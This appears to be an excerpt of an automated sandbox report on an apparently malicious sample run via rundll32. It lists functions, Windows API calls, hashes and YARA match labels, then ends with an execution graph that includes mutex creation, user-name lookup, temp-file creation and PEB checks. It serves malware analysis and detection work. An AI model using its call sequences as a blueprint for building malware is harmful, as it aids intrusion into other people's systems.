                                                • Instruction ID: 60c90dd981e6547d46de46436c0d36ecf641a17e68ea9fe07b194c06eb2ad4ce
                                                • Opcode Fuzzy Hash: 74d6f88e90dd893a090c103c4109af082bbff934e06af16182672fe97f44aebc
                                                • Instruction Fuzzy Hash: 0B11047A900219ABCB109F2ACC44ADEB3FCEF44320F544659EA27D7140EB30AE41CB64
                                                Function 7F3007EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,822C75DE,7F3152A0,?,00000000,7F313C13,000000FF,?,7F30077A,7D83FC4D,?,7F30074E,7F3152A0), ref: 7F30081F
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7F300831
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,7F313C13,000000FF,?,7F30077A,7D83FC4D,?,7F30074E,7F3152A0), ref: 7F300853
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 2944985eee28cd0b96fa8895f467118bbe3911e835d144e79014633704d2ba39
                                                • Instruction ID: adb1f4291a1b54076700b0fa9bbe5e1b7b142ea2cb54e13d6c857fd57e876993
                                                • Opcode Fuzzy Hash: 2944985eee28cd0b96fa8895f467118bbe3911e835d144e79014633704d2ba39
                                                • Instruction Fuzzy Hash: E301A276910A15EFDB059F51CC05FEEBBBCFB04722F04023AEC13A6680DB789900CA90
                                                Function 7F2A5920 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F2A5947
                                                • int.LIBCPMTD ref: 7F2A5960
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F2AAA36
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F2AAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F2A59A7
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F2A5A3B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: a67ad1f3e68cddbe04d5b6bc865ea2be2ee78e4a2c2303f5764bfe7613940f24
                                                • Instruction ID: 4d2dacc7cd820c5ec2da75aa87669619105477151e5ac4f1d1d151b92aff8954
                                                • Opcode Fuzzy Hash: a67ad1f3e68cddbe04d5b6bc865ea2be2ee78e4a2c2303f5764bfe7613940f24
                                                • Instruction Fuzzy Hash: 8C4183B5D00609DFCB04CF98D981BEEBBB5FF48310F208259E925A7394E7356A45CBA1
                                                Function 7F2A57E0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F2A5807
                                                • int.LIBCPMTD ref: 7F2A5820
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F2AAA36
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F2AAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F2A5867
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F2A58FB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: c3a43125088ff60729170b46ce59c6a1fbc30b9ee09b322b5ffaf47def903cf8
                                                • Instruction ID: be8eac11cac696c77a0889012ec281c5b3e9ca598ee777f2cb2b13bdaa840f75
                                                • Opcode Fuzzy Hash: c3a43125088ff60729170b46ce59c6a1fbc30b9ee09b322b5ffaf47def903cf8
                                                • Instruction Fuzzy Hash: DF4192B4D00609DFCB04CF98D981AEEBBB5FF48310F208259E925A7390D7356A45CBA1
                                                Function 7F2A56A0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F2A56C7
                                                • int.LIBCPMTD ref: 7F2A56E0
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F2AAA36
                                                  • Part of subcall function 7F2AAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F2AAA60
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 7F2A5727
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F2A57BB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                • String ID:
                                                • API String ID: 3053331623-0
                                                • Opcode ID: a3bf4294d42ca26ade55a5748a1c349b7171d0db87f3957d55c205570cca2b1b
                                                • Instruction ID: 302d7aa52db2190175be8485a408395964d7d7b3c65ad2f6abde3827fbe2ff42
                                                • Opcode Fuzzy Hash: a3bf4294d42ca26ade55a5748a1c349b7171d0db87f3957d55c205570cca2b1b
                                                • Instruction Fuzzy Hash: B741B4B8D00609DFCB04CF98D991BEEBBB5FF48310F208259E925A7394D7356A45CBA1
                                                Function 7F2EFDA4 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 7F2EFDAB
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F2EFDB6
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 7F2EFE24
                                                  • Part of subcall function 7F2EFF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7F2EFF1F
                                                • std::locale::_Setgloballocale.LIBCPMT ref: 7F2EFDD1
                                                • _Yarn.LIBCPMT ref: 7F2EFDE7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                • String ID:
                                                • API String ID: 1088826258-0
                                                • Opcode ID: ffe859982c4ffd72e47c7188fc067aa002ae289ca25de4fd6eb56baa9d5e54a9
                                                • Instruction ID: 72e79aea7113cb85bfe10fb384809ac71c4aac8a19fc476172f784484d7c2bb3
                                                • Opcode Fuzzy Hash: ffe859982c4ffd72e47c7188fc067aa002ae289ca25de4fd6eb56baa9d5e54a9
                                                • Instruction Fuzzy Hash: 8F019A3AA00611ABD706DB20C548A7DBBA9FF85220BB84048D86297780DF386F02CB80
                                                Function 7F2C47C1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 201libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExA.KERNEL32(advapi32,00000000,00000008), ref: 7F2C4841
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: MNo name attribute $advapi32$Operation
                                                • API String ID: 1029625771-688042845
                                                • Opcode ID: 3ff4be4e097dd714283a542636699e528cd11720873e3cd3ba17d32deb023af8
                                                • Instruction ID: 9456ed17b0b04d723b0959899ccf925910f55f2e6c4205735af0a2c1e480ac90
                                                • Opcode Fuzzy Hash: 3ff4be4e097dd714283a542636699e528cd11720873e3cd3ba17d32deb023af8
                                                • Instruction Fuzzy Hash: 3091A475D082A88BDB15CF66CC907EEBBBABF44314F1481DED449A7285CB346A90CF54
                                                Function 7F30742E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __freea
                                                • String ID: 9E(j
                                                • API String ID: 240046367-705430000
                                                • Opcode ID: bf7e7b70560e12e6e662d755a9290f75144fd59b6031b0d5e056d66a4cb2d427
                                                • Instruction ID: b119d65463d561b46344220029ab678cd91e155dffe7aff93d9ba94acdc2ed54
                                                • Opcode Fuzzy Hash: bf7e7b70560e12e6e662d755a9290f75144fd59b6031b0d5e056d66a4cb2d427
                                                • Instruction Fuzzy Hash: 2B51B772A20306AFEF15AF60CC40EFB3ABBEF44255B11012BFD0AD6150E671DD518760
                                                Function 7F2EF3BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 7F2EF3F5
                                                • CloseHandle.KERNEL32(?), ref: 7F2EF49F
                                                • CloseHandle.KERNEL32(00000000), ref: 7F2EF4A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreateProcess
                                                • String ID: ?
                                                • API String ID: 2922976086-1684325040
                                                • Opcode ID: a0433d775b8a110cd24904ca6239eeb438d8919f0cfc51785343732fce5a6cd8
                                                • Instruction ID: 4c60149079f419d37db9774eec7e0b04ff6eb167b8b93e2e1eff4c671587dfcd
                                                • Opcode Fuzzy Hash: a0433d775b8a110cd24904ca6239eeb438d8919f0cfc51785343732fce5a6cd8
                                                • Instruction Fuzzy Hash: 2821947190031ABBDF219A95CC09FEF7B7DFBC5710FE04469FA25A1050E7319A18CA60
                                                Function 7F2F4F92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7F2F4F43,00000000,00000001,7F5F55E4,?,?,?,7F2F50E6,00000004,InitializeCriticalSectionEx,7F31AE34,InitializeCriticalSectionEx), ref: 7F2F4F9F
                                                • GetLastError.KERNEL32(?,7F2F4F43,00000000,00000001,7F5F55E4,?,?,?,7F2F50E6,00000004,InitializeCriticalSectionEx,7F31AE34,InitializeCriticalSectionEx,00000000,?,7F2F4E9D), ref: 7F2F4FA9
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7F2F3D43), ref: 7F2F4FD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 21cff0dd12f0ed54b76b5bafda5b13ebfd8e375a83ddfae89c61b2c0dbe5c0bd
                                                • Instruction ID: 5d96609dcfe52b2a282eafe3f816359397e5cd59d6ca7eac6ae9ec47b317b9b6
                                                • Opcode Fuzzy Hash: 21cff0dd12f0ed54b76b5bafda5b13ebfd8e375a83ddfae89c61b2c0dbe5c0bd
                                                • Instruction Fuzzy Hash: 97E04835254705B7EB121EA2DC05F497AB9EB10772F284030F90FE94D0E7A1E9319994
                                                Function 7F2EF930 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7F2EF717,?,?,?,7F2EEF6C,?,0000000F,?,00000000,00000208), ref: 7F2EF946
                                                • GetProcAddress.KERNEL32(00000000), ref: 7F2EF94D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: RtlRandomEx$ntdll.dll
                                                • API String ID: 1646373207-4284430886
                                                • Opcode ID: e9ab37d400a9a2698b11170e98f9a3fa29e5e4128905810a8991360f31b62c59
                                                • Instruction ID: d8d0af9018401fa37a369fdf8d12e95cd637180bd974fadc9ba580f364f1419c
                                                • Opcode Fuzzy Hash: e9ab37d400a9a2698b11170e98f9a3fa29e5e4128905810a8991360f31b62c59
                                                • Instruction Fuzzy Hash: AAD0A77A6007056BDB015FE2CD08E153FAD9B042617690054FD0DC6100DB349B68CA60
                                                Function 7F30B783 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(822C75DE), ref: 7F30B7E6
                                                  • Part of subcall function 7F30772F: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000001,0000FDE9,00000000,?,?,?,7F305A54,?,00000000,?), ref: 7F3077DB
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 7F30BA41
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 7F30BA89
                                                • GetLastError.KERNEL32 ref: 7F30BB2C
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                • String ID:
                                                • API String ID: 2112829910-0
                                                • Opcode ID: 47ae057a3528f9940d9282c831c2c56dbf49f3f27c5043ac3d9be42e1191994a
                                                • Instruction ID: aafc6d0b37c96c1190b54834d08488d83fd32c85cef358a0a38b8b6117a403be
                                                • Opcode Fuzzy Hash: 47ae057a3528f9940d9282c831c2c56dbf49f3f27c5043ac3d9be42e1191994a
                                                • Instruction Fuzzy Hash: C0D13BB5D002589FCB05DFA8C880AEDBBF6FF49314F18456AE866E7355D730A942CB50
                                                Function 7F307A81 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F30772F: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000001,0000FDE9,00000000,?,?,?,7F305A54,?,00000000,?), ref: 7F3077DB
                                                • GetLastError.KERNEL32 ref: 7F307AE5
                                                • __dosmaperr.LIBCMT ref: 7F307AEC
                                                • GetLastError.KERNEL32(?,?,?,?), ref: 7F307B26
                                                • __dosmaperr.LIBCMT ref: 7F307B2D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 1913693674-0
                                                • Opcode ID: 90ef8b38a8357f7387c2aba524a3ffaf6f9ad850957ce5e2cff6eed6e9327324
                                                • Instruction ID: 1647d11003e97998239868dcbc65c4a4ec46d942f2b3034e14dfef34421b58b3
                                                • Opcode Fuzzy Hash: 90ef8b38a8357f7387c2aba524a3ffaf6f9ad850957ce5e2cff6eed6e9327324
                                                • Instruction Fuzzy Hash: 9921B371620705BFD711AF66C88096BB7BFFF00266714862AF82A9B640D730FD418BA0
                                                Function 7F2FFEC3 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddcc7f98b24df6bab2ff3c01fa0c718c2bbcba0d8f8654863c0b8caa425c6abf
                                                • Instruction ID: 35736a1780bb2a15586b28a139d7cd7d1862569bcc48d6b39bedef029c7adeee
                                                • Opcode Fuzzy Hash: ddcc7f98b24df6bab2ff3c01fa0c718c2bbcba0d8f8654863c0b8caa425c6abf
                                                • Instruction Fuzzy Hash: 37218E3162430AAFC7119F618C80E5AF7EAEF462757144715E836CB680EB30EC01CB60
                                                Function 7F30898F Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,7F300BC9), ref: 7F308997
                                                  • Part of subcall function 7F30772F: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000001,0000FDE9,00000000,?,?,?,7F305A54,?,00000000,?), ref: 7F3077DB
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7F3089CF
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7F3089EF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 158306478-0
                                                • Opcode ID: 04817ebb075197fc4ed811bbbf917466213cc8e88dfb8ea0d22aa6309cd328d6
                                                • Instruction ID: 203a227f50afce996f8a3ee848addb3cac673dbcc33b09cc99309012243f0a9d
                                                • Opcode Fuzzy Hash: 04817ebb075197fc4ed811bbbf917466213cc8e88dfb8ea0d22aa6309cd328d6
                                                • Instruction Fuzzy Hash: AF119BB6516715BFA716777A4CCCDAF2A6FEF451E9314053BFC02D6200EA24ED1242B1
                                                Function 7F30F779 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,7F30F089,?,00000001,?,?,?,7F30BB80), ref: 7F30F790
                                                • GetLastError.KERNEL32(?,7F30F089,?,00000001,?,?,?,7F30BB80), ref: 7F30F79C
                                                  • Part of subcall function 7F30F762: CloseHandle.KERNEL32(FFFFFFFE,7F30F7AC,?,7F30F089,?,00000001,?,?,?,7F30BB80), ref: 7F30F772
                                                • ___initconout.LIBCMT ref: 7F30F7AC
                                                  • Part of subcall function 7F30F724: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,7F30F753,7F30F076,?,?,7F30BB80), ref: 7F30F737
                                                • WriteConsoleW.KERNEL32(?,?,?,00000000,?,7F30F089,?,00000001,?,?,?,7F30BB80), ref: 7F30F7C1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: e3733a81b2018a3cf62b6f030cf4430cf5ad83a7d3dec1992d9c72bab1d384ea
                                                • Instruction ID: 07cc2ab5c21029f07deb94fe3fd34a6227b24ba4429053b25e818d8ec766659b
                                                • Opcode Fuzzy Hash: e3733a81b2018a3cf62b6f030cf4430cf5ad83a7d3dec1992d9c72bab1d384ea
                                                • Instruction Fuzzy Hash: 3BF0A23B510654BBCF522FA6CC44A8D3F6BFB09BB1B184819FA299A111C631D8309BA1
                                                Function 7F2F9375 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: +$-
                                                • API String ID: 3732870572-2137968064
                                                • Opcode ID: 96dc4fa864d39e531bd8ede5cc044c7597709758106bdb0bf1fcf151fe48067b
                                                • Instruction ID: 9c12977bc5aed3f5c7d462ae3157b4defaf0eb94ee971f0eb6bf135eac040608
                                                • Opcode Fuzzy Hash: 96dc4fa864d39e531bd8ede5cc044c7597709758106bdb0bf1fcf151fe48067b
                                                • Instruction Fuzzy Hash: FEA1C13092134AAFDB15CE78CC506EEFBF5EF56324F24865AE866AB384D234E501CB50
                                                Function 7F2C55B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::exception::exception.LIBCONCRTD ref: 7F2C5868
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::exception::exception
                                                • String ID: parse error$parse_error
                                                • API String ID: 2807920213-1820534363
                                                • Opcode ID: de802722b3b30ab55f0046b25cc11ae058f88909c61c29ab0177e5257169f794
                                                • Instruction ID: d5c04ad7c90973905d2bad5909432508c6c1f5029ede342b04dd5fb7212d6eb9
                                                • Opcode Fuzzy Hash: de802722b3b30ab55f0046b25cc11ae058f88909c61c29ab0177e5257169f794
                                                • Instruction Fuzzy Hash: 2BA1E274D04259DFCB18CF98C990BEEBBB1BF49300F248299D959AB341DB31AA45CF90
                                                Function 7F2F4556 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?), ref: 7F2F457B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: 43f23b99cdb8e10fda91ce4d8958edfa8ecb432952a4590fadfcbe4a2096ed93
                                                • Instruction ID: 37b051a539461f9161267d828336ffbcab55b44a29cea28e86635d636ff4f330
                                                • Opcode Fuzzy Hash: 43f23b99cdb8e10fda91ce4d8958edfa8ecb432952a4590fadfcbe4a2096ed93
                                                • Instruction Fuzzy Hash: 2641287291420AAFCF06CF94C981EEEBBF9EF48304F154199F9066A251D375AA50DF50
                                                Function 7F2A7AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F2A7AF3
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7F2A7BBF
                                                  • Part of subcall function 7F2EFEA2: _Yarn.LIBCPMT ref: 7F2EFEC1
                                                  • Part of subcall function 7F2EFEA2: _Yarn.LIBCPMT ref: 7F2EFEE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 1908188788-1405518554
                                                • Opcode ID: 382ffc15beab67dfa8b12b67479deb6236b5c4454c09c6bd9356f5ac10bc7f41
                                                • Instruction ID: 3b26a163c0d0349ff652a7d170681ed766a8aac0e1ebf4da03ea86525829bc9d
                                                • Opcode Fuzzy Hash: 382ffc15beab67dfa8b12b67479deb6236b5c4454c09c6bd9356f5ac10bc7f41
                                                • Instruction Fuzzy Hash: 2D4136B0D05289DFDB01CF98C954BAEFBF1BF49304F288198D414AB381C77A9A01CBA5

                                                Execution Graph

                                                Execution Coverage:1.9%
                                                Dynamic/Decrypted Code Coverage:72.2%
                                                Signature Coverage:20.3%
                                                Total number of Nodes:79
                                                Total number of Limit Nodes:3
                                                execution_graph 20228 7f70c160 43 API calls std::ios_base::clear 20184 7f717660 45 API calls 2 library calls 20185 6b641270 5 API calls _ValidateLocalCookies 20186 7f6d7a7b 12 API calls Concurrency::cancel_current_task 20151 7f6fd370 32 API calls std::ios_base::clear 20154 7f6e2340 38 API calls 3 library calls 20189 7f6e1e40 GetPEB 20192 7f74764a 16 API calls 4 library calls 20234 7f6f5150 18 API calls std::ios_base::clear 20235 7f6e612f 9 API calls 20236 7f730936 23 API calls 2 library calls 20240 7f6d3d30 26 API calls 20158 7f6f8f30 10 API calls _Yarn 20286 7f72f011 11 API calls _memcpy_s 20287 7f731417 4 API calls 2 library calls 20242 7f72f11c 6 API calls _memcpy_s 20290 7f70a800 43 API calls std::ios_base::clear 20163 7f74730a 24 API calls 4 library calls 20206 7f6d2eed InitializeCriticalSectionEx 20100 7f72caf0 GetSystemDirectoryW 20103 7f718840 20100->20103 20102 7f72cd96 20106 7f719280 20103->20106 20105 7f718a4e 20105->20102 20111 7f7195f0 20106->20111 20109 7f719497 GetShellWindow 20110 7f7194a1 20109->20110 20110->20105 20112 7f719817 GetProcessHeap 20111->20112 20114 7f71988d 20112->20114 20115 7f719483 20114->20115 20116 7f7198fe GetDriveTypeA 20114->20116 20115->20109 20115->20110 20116->20115 20208 7f6f42e4 6 API calls 20248 7f7481ff 18 API calls 20165 7f733be0 16 API calls 5 library calls 20212 6b63cef0 GetWindowsDirectoryW Sleep 20294 7f6e7cf0 14 API calls ___std_exception_copy 20117 6b6351c0 20118 6b6351cd 20117->20118 20119 6b63550f GetTempFileNameW 20118->20119 20120 6b635603 GetFileType 20119->20120 20121 6b63567e 20120->20121 20136 6b634c40 20121->20136 20125 6b6358d3 20126 6b635f8a LoadLibraryA 20125->20126 20127 6b636215 20126->20127 20128 6b63653a GetUserNameA 20127->20128 20129 6b636586 20128->20129 20130 6b634c40 GetSystemDirectoryW 20129->20130 20131 6b636778 lstrlenA 20130->20131 20133 6b636d61 20131->20133 20134 6b636e30 lstrlenA 20133->20134 20135 6b637109 20134->20135 20137 6b634ddb GetSystemDirectoryW 20136->20137 20138 6b634df5 GetSystemDirectoryA 20136->20138 20137->20138 20138->20125 20167 7f743fde 5 API calls std::_Locinfo::_Locinfo_dtor 20252 7f7315d8 15 API calls ___std_type_info_destroy_list 20213 7f6d42c0 36 API calls Concurrency::cancellation_token_source::~cancellation_token_source 20253 7f7389c3 16 API calls __Getctype 20171 7f6f47d4 GetPEB GetPEB GetPEB GetPEB 20255 7f6d85d0 45 API calls 3 library calls 20300 7f6e70d0 47 API calls 20257 7f6dc1a0 35 API calls 3 library calls 20302 7f74643b 14 API calls 20139 7f6f77a0 20140 7f6f7a3f CreateMutexA 20139->20140 20142 7f6f79a6 20139->20142 20141 7f6f7b44 GetLastError 20140->20141 20144 7f6f7a5a 20140->20144 20141->20144 20145 7f6f7b55 20141->20145 20142->20140 20146 7f6f7be4 CloseHandle 20145->20146 20146->20144 20260 7f72c5a0 IsCharLowerA GetModuleFileNameW 20220 7f6d7ab7 11 API calls 20264 7f727d90 15 API calls 2 library calls 20221 6b63fe80 6 API calls 3 library calls 20265 6b63bd80 Sleep 20308 7f744890 LeaveCriticalSection _fwprintf_s 20312 7f6e8480 58 API calls 20179 7f74c387 